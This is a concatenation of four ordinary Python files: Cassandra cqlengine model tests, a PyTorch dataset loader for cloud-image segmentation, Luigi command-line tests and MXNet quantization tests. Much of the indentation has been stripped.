tm2 = TestModel.objects(id=tm.pk).first()
self.assertIsInstance(tm2, TestModel)
assert tm2.text is None
assert tm2._values['text'].previous_value is None
def test_a_sensical_error_is_raised_if_you_try_to_create_a_table_twice(self):
"""
"""
sync_table(TestModel)
sync_table(TestModel)
class TestMultiKeyModel(Model):
partition = columns.Integer(primary_key=True)
cluster = columns.Integer(primary_key=True)
count = columns.Integer(required=False)
text = columns.Text(required=False)
class TestDeleting(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestDeleting, cls).setUpClass()
drop_table(TestMultiKeyModel)
sync_table(TestMultiKeyModel)
@classmethod
def tearDownClass(cls):
super(TestDeleting, cls).tearDownClass()
drop_table(TestMultiKeyModel)
def test_deleting_only_deletes_one_object(self):
partition = random.randint(0, 1000)
for i in range(5):
TestMultiKeyModel.create(partition=partition, cluster=i, count=i, text=str(i))
assert TestMultiKeyModel.filter(partition=partition).count() == 5
TestMultiKeyModel.get(partition=partition, cluster=0).delete()
assert TestMultiKeyModel.filter(partition=partition).count() == 4
TestMultiKeyModel.filter(partition=partition).delete()
class TestUpdating(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestUpdating, cls).setUpClass()
drop_table(TestMultiKeyModel)
sync_table(TestMultiKeyModel)
@classmethod
def tearDownClass(cls):
super(TestUpdating, cls).tearDownClass()
drop_table(TestMultiKeyModel)
def setUp(self):
super(TestUpdating, self).setUp()
self.instance = TestMultiKeyModel.create(
partition=random.randint(0, 1000),
cluster=random.randint(0, 1000),
count=0,
text='happy'
)
def test_vanilla_update(self):
self.instance.count = 5
self.instance.save()
check = TestMultiKeyModel.get(partition=self.instance.partition, cluster=self.instance.cluster)
assert check.count == 5
assert check.text == 'happy'
def test_deleting_only(self):
self.instance.count = None
self.instance.text = None
self.instance.save()
check = TestMultiKeyModel.get(partition=self.instance.partition, cluster=self.instance.cluster)
assert check.count is None
assert check.text is None
def test_get_changed_columns(self):
assert self.instance.get_changed_columns() == []
self.instance.count = 1
changes = self.instance.get_changed_columns()
assert len(changes) == 1
assert changes == ['count']
self.instance.save()
assert self.instance.get_changed_columns() == []
class TestCanUpdate(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestCanUpdate, cls).setUpClass()
drop_table(TestModel)
sync_table(TestModel)
@classmethod
def tearDownClass(cls):
super(TestCanUpdate, cls).tearDownClass()
drop_table(TestModel)
def test_success_case(self):
tm = TestModel(count=8, text='123456789')
# object hasn't been saved,
# shouldn't be able to update
assert not tm._is_persisted
assert not tm._can_update()
tm.save()
# object has been saved,
# should be able to update
assert tm._is_persisted
assert tm._can_update()
tm.count = 200
# primary keys haven't changed,
# should still be able to update
assert tm._can_update()
tm.save()
tm.id = uuid4()
# primary keys have changed,
# should not be able to update
assert not tm._can_update()
class IndexDefinitionModel(Model):
key = columns.UUID(primary_key=True)
val = columns.Text(index=True)
class TestIndexedColumnDefinition(BaseCassEngTestCase):
def test_exception_isnt_raised_if_an_index_is_defined_more_than_once(self):
sync_table(IndexDefinitionModel)
sync_table(IndexDefinitionModel)
class ReservedWordModel(Model):
token = columns.Text(primary_key=True)
insert = columns.Integer(index=True)
class TestQueryQuoting(BaseCassEngTestCase):
def test_reserved_cql_words_can_be_used_as_column_names(self):
"""
"""
sync_table(ReservedWordModel)
model1 = ReservedWordModel.create(token='1', insert=5)
model2 = ReservedWordModel.filter(token='1')
assert len(model2) == 1
assert model1.token == model2[0].token
assert model1.insert == model2[0].insert
class TestQueryModel(Model):
test_id = columns.UUID(primary_key=True, default=uuid4)
date = columns.Date(primary_key=True)
description = columns.Text()
class TestQuerying(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestQuerying, cls).setUpClass()
drop_table(TestQueryModel)
sync_table(TestQueryModel)
@classmethod
def tearDownClass(cls):
super(TestQuerying, cls).tearDownClass()
drop_table(TestQueryModel)
def test_query_with_date(self):
uid = uuid4()
day = date(2013, 11, 26)
obj = TestQueryModel.create(test_id=uid, date=day, description=u'foo')
self.assertEqual(obj.description, u'foo')
inst = TestQueryModel.filter(
TestQueryModel.test_id == uid,
TestQueryModel.date == day).limit(1).first()
assert inst.test_id == uid
assert inst.date == day
def test_none_filter_fails():
class NoneFilterModel(Model):
pk = columns.Integer(primary_key=True)
v = columns.Integer()
sync_table(NoneFilterModel)
try:
NoneFilterModel.objects(pk=None)
raise Exception("fail")
    except CQLEngineException:
        pass
|
|
import os
import cv2
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from torch.utils.data import DataLoader, Dataset
import albumentations as albu
import warnings
from augs import (
get_training_augmentation,
get_validation_augmentation,
get_preprocessing,
)
warnings.filterwarnings("once")
def get_img(x: str = "img_name", folder: str = "train_images"):
"""
Return image based on image name and folder.
Args:
x: image name
folder: folder with images
    Returns:
        image as an RGB numpy array
"""
image_path = os.path.join(folder, x)
img = cv2.imread(image_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
return img
def rle_decode(mask_rle: str = "", shape: tuple = (1400, 2100)):
"""
Decode rle encoded mask.
Args:
mask_rle: encoded mask
shape: final shape
    Returns:
        decoded binary mask as a numpy array of the given shape
"""
s = mask_rle.split()
starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]
starts -= 1
ends = starts + lengths
img = np.zeros(shape[0] * shape[1], dtype=np.uint8)
for lo, hi in zip(starts, ends):
img[lo:hi] = 1
return img.reshape(shape, order="F")
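# Worked example (illustrative): the RLE string "1 3 10 2" marks pixels 1-3
# and 10-11 in the 1-based, column-major (order="F") flattening, so exactly
# 5 pixels of the decoded mask are set.
def _example_rle_decode():
    decoded = rle_decode("1 3 10 2", shape=(4, 3))
    assert decoded.sum() == 5
    return decoded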
def make_mask(
df: pd.DataFrame, image_name: str = "img.jpg", shape: tuple = (1400, 2100)
):
"""
Create mask based on df, image name and shape.
Args:
df: dataframe with cloud dataset
image_name: image name
shape: final shape
    Returns:
        numpy array of shape (shape[0], shape[1], 4) with one mask per class
"""
encoded_masks = df.loc[df["im_id"] == image_name, "EncodedPixels"]
masks = np.zeros((shape[0], shape[1], 4), dtype=np.float32)
for idx, label in enumerate(encoded_masks.values):
if label is not np.nan:
mask = rle_decode(label)
masks[:, :, idx] = mask
return masks
def mask2rle(img):
"""
Convert mask to rle.
Args:
        img: binary mask as a numpy array
    Returns:
        run-length encoded string
"""
pixels = img.T.flatten()
pixels = np.concatenate([[0], pixels, [0]])
runs = np.where(pixels[1:] != pixels[:-1])[0] + 1
runs[1::2] -= runs[::2]
return " ".join(str(x) for x in runs)
class CloudDataset(Dataset):
def __init__(
self,
path: str = "",
df: pd.DataFrame = None,
datatype: str = "train",
img_ids: np.array = None,
transforms=albu.Compose([albu.HorizontalFlip()]),
preprocessing=None,
preload: bool = False,
image_size: tuple = (320, 640),
augmentation: str = "default",
filter_bad_images: bool = False,
):
"""
Args:
path: path to data
df: dataframe with data
datatype: train|valid|test
            img_ids: list of image ids
transforms: albumentation transforms
preprocessing: preprocessing if necessary
preload: whether to preload data
image_size: image size for resizing
augmentation: name of augmentation settings
filter_bad_images: to filter out bad images
"""
self.df = df
self.path = path
self.datatype = datatype if datatype == "test" else "train"
if self.datatype != "test":
self.data_folder = f"{path}/train_images"
else:
self.data_folder = f"{path}/test_images"
self.img_ids = img_ids
# list of bad images from discussions
self.bad_imgs = [
"046586a.jpg",
"1588d4c.jpg",
"1e40a05.jpg",
"41f92e5.jpg",
"449b792.jpg",
"563fc48.jpg",
"8bd81ce.jpg",
"c0306e5.jpg",
"c26c635.jpg",
"e04fea3.jpg",
"e5f2f24.jpg",
"eda52f2.jpg",
"fa645da.jpg",
]
if filter_bad_images:
self.img_ids = [i for i in self.img_ids if i not in self.bad_imgs]
self.transforms = transforms
self.preprocessing = preprocessing
self.augmentation = augmentation
self.dir_name = (
f"{self.path}/preload_{augmentation}_{image_size[0]}_{image_size[1]}"
)
self.preload = preload
self.preloaded = False
if self.preload:
self.save_processed_()
self.preloaded = True
def save_processed_(self):
"""
Saves train images with augmentations, to speed up training.
Returns:
"""
os.makedirs(self.dir_name, exist_ok=True)
self.dir_name += f"/{self.datatype}"
if not os.path.exists(self.dir_name):
os.makedirs(self.dir_name)
for i, e in enumerate(self.img_ids):
img, mask = self.__getitem__(i)
np.save(f"{self.dir_name}/{e}_mask.npy", mask)
np.save(f"{self.dir_name}/{e}_img.npy", img)
def __getitem__(self, idx):
image_name = self.img_ids[idx]
if self.preloaded and self.datatype != "valid":
img = np.load(f"{self.dir_name}/{image_name}_img.npy")
mask = np.load(f"{self.dir_name}/{image_name}_mask.npy")
else:
mask = make_mask(self.df, image_name)
image_path = os.path.join(self.data_folder, image_name)
img = cv2.imread(image_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
augmented = self.transforms(image=img, mask=mask)
img = augmented["image"]
mask = augmented["mask"]
if self.preprocessing:
preprocessed = self.preprocessing(image=img, mask=mask)
img = preprocessed["image"]
mask = preprocessed["mask"]
return img, mask
def __len__(self):
return len(self.img_ids)
class CloudDatasetClassification(Dataset):
def __init__(
self,
path: str = "",
df: pd.DataFrame = None,
datatype: str = "train",
img_ids: np.array = None,
transforms=albu.Compose([albu.HorizontalFlip()]),
preprocessing=None,
preload: bool = False,
image_size: tuple = (320, 640),
augmentation: str = "default",
one_hot_labels: dict = None,
filter_bad_images: bool = False,
):
"""
Args:
path: path to data
df: dataframe with data
datatype: train|valid|test
            img_ids: list of image ids
transforms: albumentation transforms
preprocessing: preprocessing if necessary
preload: whether to preload data
image_size: image size for resizing
augmentation: name of augmentation settings
one_hot_labels: dictionary with labels for images
filter_bad_images: to filter out bad images
"""
self.df = df
self.path = path
self.datatype = datatype if datatype == "test" else "train"
if self.datatype != "test":
self.data_folder = f"{path}/train_images"
else:
self.data_folder = f"{path}/test_images"
self.img_ids = img_ids
self.bad_imgs = [
"046586a.jpg",
"1588d4c.jpg",
"1e40a05.jpg",
"41f92e5.jpg",
"449b792.jpg",
"563fc48.jpg",
"8bd81ce.jpg",
"c0306e5.jpg",
"c26c635.jpg",
"e04fea3.jpg",
"e5f2f24.jpg",
"eda52f2.jpg",
"fa645da.jpg",
]
if filter_bad_images:
self.img_ids = [i for i in self.img_ids if i not in self.bad_imgs]
self.transforms = transforms
self.preprocessing = preprocessing
self.augmentation = augmentation
self.dir_name = (
f"{self.path}/preload_{augmentation}_{image_size[0]}_{image_size[1]}"
)
self.one_hot_labels = one_hot_labels
self.preload = preload
self.preloaded = False
if self.preload:
self.save_processed_()
self.preloaded = True
def save_processed_(self):
os.makedirs(self.dir_name, exist_ok=True)
self.dir_name += f"/{self.datatype}"
if not os.path.exists(self.dir_name):
os.makedirs(self.dir_name)
for i, e in enumerate(self.img_ids):
            img, _ = self.__getitem__(i)  # __getitem__ returns (img, label); only img is cached
np.save(f"{self.dir_name}/{e}_img.npy", img)
def __getitem__(self, idx):
image_name = self.img_ids[idx]
if self.preloaded and self.datatype != "valid":
img = np.load(f"{self.dir_name}/{image_name}_img.npy")
else:
image_path = os.path.join(self.data_folder, image_name)
img = cv2.imread(image_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
augmented = self.transforms(image=img)
img = augmented["image"]
if self.preprocessing:
preprocessed = self.preprocessing(image=img)
img = preprocessed["image"]
label = self.one_hot_labels[image_name]
return img, label
def __len__(self):
return len(self.img_ids)
def prepare_loaders(
path: str = "",
bs: int = 4,
num_workers: int = 0,
preprocessing_fn=None,
preload: bool = False,
image_size: tuple = (320, 640),
augmentation: str = "default",
task: str = "segmentation",
):
"""
Prepare dataloaders for catalyst.
At first reads dataframe with the data and prepares it to be used in dataloaders.
Creates dataloaders and returns them.
Args:
path: path to data
bs: batch size
num_workers: number of workers
preprocessing_fn: preprocessing
preload: whether to save augmented data on disk
image_size: image size to resize
augmentation: augmentation name
task: segmentation or classification
    Returns:
        dictionary with 'train', 'valid' and 'test' dataloaders
"""
train = pd.read_csv(f"{path}/train.csv")
train["label"] = train["Image_Label"].apply(lambda x: x.split("_")[1])
train["im_id"] = train["Image_Label"].apply(lambda x: x.split("_")[0])
id_mask_count = (
train.loc[~train["EncodedPixels"].isnull(), "Image_Label"]
.apply(lambda x: x.split("_")[0])
.value_counts()
.reset_index()
.rename(columns={"index": "img_id", "Image_Label": "count"})
)
train_ids, valid_ids = train_test_split(
id_mask_count["img_id"].values,
random_state=42,
shuffle=True,
# stratify=id_mask_count['count'],
test_size=0.1,
)
if task == "classification":
train_df = train[~train["EncodedPixels"].isnull()]
classes = train_df["label"].unique()
train_df = train_df.groupby("im_id")["label"].agg(set).reset_index()
for class_name in classes:
train_df[class_name] = train_df["label"].map(
lambda x: 1 if class_name in x else 0
)
img_2_ohe_vector = {
img: np.float32(vec)
for img, vec in zip(train_df["im_id"], train_df.iloc[:, 2:].values)
}
sub = pd.read_csv(f"{path}/sample_submission.csv")
sub["label"] = sub["Image_Label"].apply(lambda x: x.split("_")[1])
sub["im_id"] = sub["Image_Label"].apply(lambda x: x.split("_")[0])
test_ids = (
sub["Image_Label"].apply(lambda x: x.split("_")[0]).drop_duplicates().values
)
if task == "segmentation":
if preload:
_ = CloudDataset(
path=path,
df=train,
datatype="train",
img_ids=id_mask_count["img_id"].values,
transforms=get_training_augmentation(
augmentation=augmentation, image_size=image_size
),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
)
train_dataset = CloudDataset(
path=path,
df=train,
datatype="train",
img_ids=train_ids,
transforms=get_training_augmentation(
augmentation=augmentation, image_size=image_size
),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
)
valid_dataset = CloudDataset(
path=path,
df=train,
datatype="valid",
img_ids=valid_ids,
transforms=get_validation_augmentation(image_size=image_size),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
)
elif task == "classification":
if preload:
_ = CloudDatasetClassification(
path=path,
df=train,
datatype="train",
img_ids=id_mask_count["img_id"].values,
transforms=get_training_augmentation(
augmentation=augmentation, image_size=image_size
),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
one_hot_labels=img_2_ohe_vector,
)
train_dataset = CloudDatasetClassification(
path=path,
df=train,
datatype="train",
img_ids=train_ids,
transforms=get_training_augmentation(
augmentation=augmentation, image_size=image_size
),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
one_hot_labels=img_2_ohe_vector,
)
valid_dataset = CloudDatasetClassification(
path=path,
df=train,
datatype="valid",
img_ids=valid_ids,
transforms=get_validation_augmentation(image_size=image_size),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
one_hot_labels=img_2_ohe_vector,
)
train_loader = DataLoader(
train_dataset,
batch_size=bs,
shuffle=True,
num_workers=num_workers,
pin_memory=True,
)
valid_loader = DataLoader(
valid_dataset,
batch_size=bs,
shuffle=False,
num_workers=num_workers,
pin_memory=True,
)
test_dataset = CloudDataset(
path=path,
df=sub,
datatype="test",
img_ids=test_ids,
transforms=get_validation_augmentation(image_size=image_size),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
)
test_loader = DataLoader(
test_dataset,
batch_size=bs // 2,
shuffle=False,
num_workers=num_workers,
pin_memory=True,
)
loaders = {"train": train_loader, "valid": valid_loader, "test": test_loader}
return loaders
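# Minimal usage sketch (illustrative: the data path is a placeholder and no
# preprocessing function is supplied) showing the dict of loaders returned by
# prepare_loaders().
def _example_prepare_loaders():
    loaders = prepare_loaders(
        path="/path/to/understanding_clouds",
        bs=8,
        num_workers=2,
        preprocessing_fn=None,
        image_size=(320, 640),
        augmentation="default",
        task="segmentation",
    )
    return loaders["train"], loaders["valid"], loaders["test"]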
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import logging
import mock
import os
import subprocess
from helpers import unittest
import warnings
from luigi import six
import luigi
from luigi.mock import MockTarget
class SomeTask(luigi.Task):
n = luigi.IntParameter()
def output(self):
return MockTarget('/tmp/test_%d' % self.n)
def run(self):
f = self.output().open('w')
f.write('done')
f.close()
class AmbiguousClass(luigi.Task):
pass
class AmbiguousClass(luigi.Task):
pass
class TaskWithSameName(luigi.Task):
def run(self):
self.x = 42
class TaskWithSameName(luigi.Task):
# there should be no ambiguity
def run(self):
self.x = 43
class WriteToFile(luigi.Task):
filename = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.filename)
def run(self):
f = self.output().open('w')
print('foo', file=f)
f.close()
class FooBaseClass(luigi.Task):
x = luigi.Parameter(default='foo_base_default')
class FooSubClass(FooBaseClass):
pass
class CmdlineTest(unittest.TestCase):
def setUp(self):
MockTarget.fs.clear()
@mock.patch("logging.getLogger")
def test_cmdline_main_task_cls(self, logger):
luigi.run(['--local-scheduler', '--no-lock', '--n', '100'], main_task_cls=SomeTask)
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_100': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_local_scheduler(self, logger):
luigi.run(['SomeTask', '--no-lock', '--n', '101'], local_scheduler=True)
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_101': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_other_task(self, logger):
luigi.run(['--local-scheduler', '--no-lock', 'SomeTask', '--n', '1000'])
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_1000': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_ambiguous_class(self, logger):
self.assertRaises(Exception, luigi.run, ['--local-scheduler', '--no-lock', 'AmbiguousClass'])
@mock.patch("logging.getLogger")
@mock.patch("logging.StreamHandler")
def test_setup_interface_logging(self, handler, logger):
handler.return_value = mock.Mock(name="stream_handler")
with mock.patch("luigi.interface.setup_interface_logging.has_run", new=False):
luigi.interface.setup_interface_logging()
self.assertEqual([mock.call(handler.return_value)], logger.return_value.addHandler.call_args_list)
with mock.patch("luigi.interface.setup_interface_logging.has_run", new=False):
if six.PY2:
error = ConfigParser.NoSectionError
else:
error = KeyError
self.assertRaises(error, luigi.interface.setup_interface_logging, '/blah')
@mock.patch("warnings.warn")
@mock.patch("luigi.interface.setup_interface_logging")
def test_cmdline_logger(self, setup_mock, warn):
with mock.patch("luigi.interface.core") as env_params:
env_params.return_value.logging_conf_file = None
luigi.run(['SomeTask', '--n', '7', '--local-scheduler', '--no-lock'])
self.assertEqual([mock.call(None)], setup_mock.call_args_list)
with mock.patch("luigi.configuration.get_config") as getconf:
getconf.return_value.get.side_effect = ConfigParser.NoOptionError(section='foo', option='bar')
getconf.return_value.getint.return_value = 0
luigi.interface.setup_interface_logging.call_args_list = []
luigi.run(['SomeTask', '--n', '42', '--local-scheduler', '--no-lock'])
self.assertEqual([], setup_mock.call_args_list)
@mock.patch('argparse.ArgumentParser.print_usage')
def test_non_existent_class(self, print_usage):
self.assertRaises(luigi.task_register.TaskClassNotFoundException,
luigi.run, ['--local-scheduler', '--no-lock', 'XYZ'])
@mock.patch('argparse.ArgumentParser.print_usage')
def test_no_task(self, print_usage):
self.assertRaises(SystemExit, luigi.run, ['--local-scheduler', '--no-lock'])
class InvokeOverCmdlineTest(unittest.TestCase):
def _run_cmdline(self, args):
env = os.environ.copy()
env['PYTHONPATH'] = env.get('PYTHONPATH', '') + ':.:test'
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
stdout, stderr = p.communicate() # Unfortunately subprocess.check_output is 2.7+
return p.returncode, stdout, stderr
def test_bin_luigi(self):
t = luigi.LocalTarget(is_tmp=True)
args = ['./bin/luigi', '--module', 'cmdline_test', 'WriteToFile', '--filename', t.path, '--local-scheduler', '--no-lock']
self._run_cmdline(args)
self.assertTrue(t.exists())
def test_direct_python(self):
t = luigi.LocalTarget(is_tmp=True)
args = ['python', 'test/cmdline_test.py', 'WriteToFile', '--filename', t.path, '--local-scheduler', '--no-lock']
self._run_cmdline(args)
self.assertTrue(t.exists())
def test_direct_python_help(self):
returncode, stdout, stderr = self._run_cmdline(['python', 'test/cmdline_test.py', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertFalse(stdout.find(b'--x') != -1)
def test_direct_python_help_class(self):
returncode, stdout, stderr = self._run_cmdline(['python', 'test/cmdline_test.py', 'FooBaseClass', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertTrue(stdout.find(b'--x') != -1)
def test_bin_luigi_help(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--module', 'cmdline_test', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertFalse(stdout.find(b'--x') != -1)
def test_bin_luigi_help_no_module(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--help'])
self.assertTrue(stdout.find(b'usage:') != -1)
def test_bin_luigi_no_parameters(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi'])
self.assertTrue(stderr.find(b'No task specified') != -1)
def test_bin_luigi_help_class(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--module', 'cmdline_test', 'FooBaseClass', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertTrue(stdout.find(b'--x') != -1)
class NewStyleParameters822Test(unittest.TestCase):
# See https://github.com/spotify/luigi/issues/822
def test_subclasses(self):
ap = luigi.interface._ArgParseInterface()
task, = ap.parse(['--local-scheduler', '--no-lock', 'FooSubClass', '--x', 'xyz', '--FooBaseClass-x', 'xyz'])
self.assertEquals(task.x, 'xyz')
# This won't work because --FooSubClass-x doesn't exist
self.assertRaises(BaseException, ap.parse, (['--local-scheduler', '--no-lock', 'FooBaseClass', '--x', 'xyz', '--FooSubClass-x', 'xyz']))
def test_subclasses_2(self):
ap = luigi.interface._ArgParseInterface()
# https://github.com/spotify/luigi/issues/822#issuecomment-77782714
task, = ap.parse(['--local-scheduler', '--no-lock', 'FooBaseClass', '--FooBaseClass-x', 'xyz'])
self.assertEquals(task.x, 'xyz')
if __name__ == '__main__':
# Needed for one of the tests
luigi.run()
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import mxnet as mx
import numpy as np
import unittest
import ctypes
from mxnet.module import Module
from mxnet.symbol import Symbol
from importlib import import_module
from numpy.testing import assert_allclose
from mxnet.base import SymbolHandle, check_call, _LIB, mx_uint, c_str
from mxnet.test_utils import DummyIter
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.append(os.path.join(curr_path, '../unittest/'))
from common import with_seed
from mxnet.test_utils import assert_almost_equal, assert_almost_equal_with_err
import itertools
OP_NAME='op_name'
QUANTIZED_OP_NAME='quantized_op_name'
SG_PASS_NAME='MKLDNN'
QUANTIZE_SG_PASS_NAME='MKLDNN_QUANTIZE'
config = {
'conv': {
OP_NAME: 'sg_mkldnn_conv',
QUANTIZED_OP_NAME: 'quantized_sg_mkldnn_conv'
},
'fc': {
OP_NAME: 'sg_mkldnn_fully_connected',
QUANTIZED_OP_NAME: 'quantized_sg_mkldnn_fully_connected'
}
}
DATA_SHAPE=[(64, 4, 10, 10), (4, 3, 24, 24), (1, 16, 32, 32)]
fc_post_ops_list=['relu', 'sigmoid', 'tanh', 'softrelu',
'square', 'square_root', 'abs', 'exp', 'bounded_relu']
def check_qsym_calibrated(qsym, out_type, name='conv'):
quantized_op_name = 'quantized_' + name
assert ''.join(qsym.attr_dict().keys()).find(quantized_op_name) != -1
for k, v in qsym.attr_dict().items():
if k.find('_quantize') != -1:
assert v['out_type'] == out_type
if k.find(quantized_op_name) != -1:
if quantized_op_name.startswith("quantized_sg_mkldnn_fully_connected") and 'enable_float_output' in v:
continue
assert 'min_calib_range' in v
assert 'max_calib_range' in v
def check_qsym_scale_align(qsym):
assert ''.join(qsym.attr_dict().keys()).find('quantized_sg_mkldnn_conv') != -1
init = False
for k, v in qsym.attr_dict().items():
if k.find('quantized_sg_mkldnn_conv') != -1:
assert 'min_calib_range' in v
assert 'max_calib_range' in v
if not init:
min_calib_range = v['min_calib_range']
max_calib_range = v['max_calib_range']
init = True
else:
assert min_calib_range == v['min_calib_range']
assert max_calib_range == v['max_calib_range']
def check_qsym_forward(qsym, qarg_params, qaux_params, batch, data_shape):
mod = Module(symbol=qsym, label_names=None, context=mx.current_context())
mod.bind(for_training=False,
data_shapes=[('data', data_shape)])
mod.set_params(qarg_params, qaux_params)
mod.forward(batch, is_train=False)
for output in mod.get_outputs():
output.wait_to_read()
return mod.get_outputs()
def check_qsym_dummy_forward(qsym, batch, data_shape):
mod = Module(symbol=qsym, label_names=None, context=mx.current_context())
mod.bind(for_training=False,
data_shapes=[('data', data_shape)])
mod.init_params(initializer=mx.init.Xavier(magnitude=2.))
mod.forward(batch, is_train=False)
for output in mod.get_outputs():
output.wait_to_read()
return mod.get_outputs()
def check_qsym_gluon_forward(qsym, qarg_params, qaux_params, data_shape):
# save qsym to JSON file
qsym.save('quantized-symbol.json')
# save params
save_dict = {('arg:%s' % k): v.as_in_context(mx.current_context()) for k, v in qarg_params.items()}
save_dict.update({('aux:%s' % k): v.as_in_context(mx.current_context()) for k, v in qaux_params.items()})
mx.nd.save('quantized-0000.params', save_dict)
# load back with SymbolBlock
net = mx.gluon.SymbolBlock.imports('quantized-symbol.json', ['data'], 'quantized-0000.params')
net.collect_params().reset_ctx(ctx = mx.current_context())
net.hybridize()
data = mx.random.uniform(-1.0, 1.0, shape=data_shape)
net(data)
class CalibIter(mx.io.DataIter):
def __init__(self, batch, data_shape, batch_size):
super(CalibIter, self).__init__(batch_size)
self.data_shape = data_shape
self.label_shape = (batch_size,)
self.provide_data = [('data', self.data_shape)]
self.provide_label = []
self.batch = batch
def __iter__(self):
yield self.batch
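# Illustrative sketch: CalibIter wraps a single pre-built DataBatch so it can
# be passed to mx.contrib.quant.quantize_model() as naive calibration data,
# as done in check_quantize() below.
def _example_calib_iter(data_shape=(1, 4, 10, 10)):
    batch = mx.io.DataBatch([mx.nd.random.uniform(shape=data_shape)], [])
    return CalibIter(batch, data_shape, 1)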
def check_quantize(sym, data_shape, out_type, name='conv',
check_calibration=True, gluon_forward=False, check_scale_align=False):
quantize_granularity_list = ['tensor-wise']
if name == 'fc':
quantize_granularity_list += ['channel-wise']
if name in config:
name = config[name][OP_NAME]
sym_sg = sym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
mod = Module(symbol=sym, label_names=None)
mod.bind(for_training=False,
data_shapes=[('data', data_shape)])
mod.init_params(mx.init.Normal(0.5))
arg_params, aux_params = mod.get_params()
if out_type == 'uint8':
data = [mx.random.uniform(0.0, 1.0, shape=shape, ctx=mx.current_context()) for _, shape in mod.data_shapes]
else:
data = [mx.random.uniform(-1.0, 1.0, shape=shape, ctx=mx.current_context()) for _, shape in mod.data_shapes]
batch = mx.io.DataBatch(data, [])
mod.forward(batch, is_train=False)
for output in mod.get_outputs():
output.wait_to_read()
ref_out = mod.get_outputs()
excluded_sym_names = []
excluded_op_names = []
if mx.current_context() == mx.cpu() and gluon_forward == True:
excluded_op_names += ['_sg_mkldnn_fully_connected']
calib_data = CalibIter(batch, data_shape, 1)
for quantize_granularity in quantize_granularity_list:
qsym, qarg_params, qaux_params = mx.contrib.quant.quantize_model(sym=sym_sg,
arg_params=arg_params,
aux_params=aux_params,
ctx=mx.current_context(),
excluded_sym_names=excluded_sym_names,
excluded_op_names=excluded_op_names,
quantized_dtype=out_type,
calib_mode='naive',
calib_data=calib_data,
label_names=None,
num_calib_examples=1,
quantize_mode='full',
quantize_granularity=quantize_granularity)
qsym = qsym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
if check_calibration:
check_qsym_calibrated(qsym, out_type, name=name)
if check_scale_align:
check_qsym_scale_align(qsym)
if gluon_forward == True:
check_qsym_gluon_forward(qsym, qarg_params, qaux_params, data_shape)
else:
quantized_out = check_qsym_forward(qsym, qarg_params, qaux_params, batch, data_shape)
for i in range(len(ref_out)):
min_range = mx.nd.min(ref_out[i]).asscalar()
max_range = mx.nd.max(ref_out[i]).asscalar()
atol = 0.1 * max(abs(min_range), abs(max_range))
assert_almost_equal_with_err(quantized_out[i].asnumpy(), ref_out[i].asnumpy(), rtol=0.1, atol=atol, etol=0.2)
check_qsym_dummy_forward(qsym, batch, data_shape)
@with_seed()
def check_quantize_whole_model_with_forward():
def check_qsym_forward(qsym, qarg_params, qaux_params, data_shape):
mod = Module(symbol=qsym, label_names=None, context=mx.current_context())
mod.bind(for_training=False,
data_shapes=[('data', data_shape)])
mod.set_params(qarg_params, qaux_params)
data = [mx.random.uniform(-1.0, 1.0, shape=shape) for _, shape in mod.data_shapes]
batch = mx.io.DataBatch(data, [])
mod.forward(batch, is_train=False)
